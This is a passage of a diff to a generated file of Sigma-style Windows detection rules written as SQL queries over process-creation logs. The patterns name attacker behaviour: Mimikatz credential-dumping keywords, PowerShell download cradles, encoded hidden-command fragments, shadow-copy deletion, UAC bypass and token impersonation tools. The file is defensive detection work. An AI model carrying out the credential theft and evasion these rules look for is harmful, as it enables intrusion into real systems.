via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.discovery" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" ], - "filename": "proc_creation_win_whoami_execution.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" }, { - "title": "Hardware Model Reconnaissance Via Wmic.EXE", - "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", "status": "experimental", - "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. 
the administrator account)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_csproduct.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "PUA - Advanced IP Scanner Execution", - "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", "status": "experimental", - "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", - "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate administrative use" + "Programs that use the same command line flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Remote PowerShell Session Host Process (WinRM)", - "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", - "status": "test", - "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Lolbin Unregmp2.exe Use As Proxy", + "id": "727454c0-d851-48b0-8b89-385611ab0704", 
+ "status": "experimental", + "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of remote Powershell, e.g. for monitoring purposes." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" + "filename": "proc_creation_win_lolbin_unregmp2.yml" }, { - "title": "PUA - AdvancedRun Execution", - "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a 
file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Use of UltraViewer Remote Access Software", - "id": "88656cec-6c3b-487c-82c0-f73ebb805503", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Suspicious Process Start Locations", + "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "status": "test", + "description": "Detects suspicious process run from unusual locations", + "author": "juju4, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" ], "falsepositives": [ - "Legitimate use" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" + "filename": "proc_creation_win_rundll32_run_locations.yml" }, { - "title": "Dropping Of Password Filter DLL", - "id": "b7966f4a-b333-455b-8370-8ca53c229762", + "title": "HTML Help HH.EXE Suspicious Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects dropping of dll files in system32 that may be used 
to retrieve user credentials from LSASS", - "author": "Sreeman", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" + "filename": 
"proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", - "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "status": "experimental", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE 
'%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE 
'%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "WebDav Client Execution", - "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unknown" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND 
((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE 
'\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "Password Protected Compressed File Extraction Via 7Zip", + "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Legitimate activity is expected since extracting files with a password can be common in some environement." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_7zip_password_extraction.yml" }, { - "title": "Nslookup PowerShell Download Cradle - ProcessCreation", - "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "title": "Start of NT Virtual DOS Machine", + "id": "16905e21-66ee-42fe-b256-1318ada2d770", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "author": "frack113", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_poweshell_download.yml" + "filename": "proc_creation_win_susp_16bit_application.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", + "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", + "status": "experimental", + "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. 
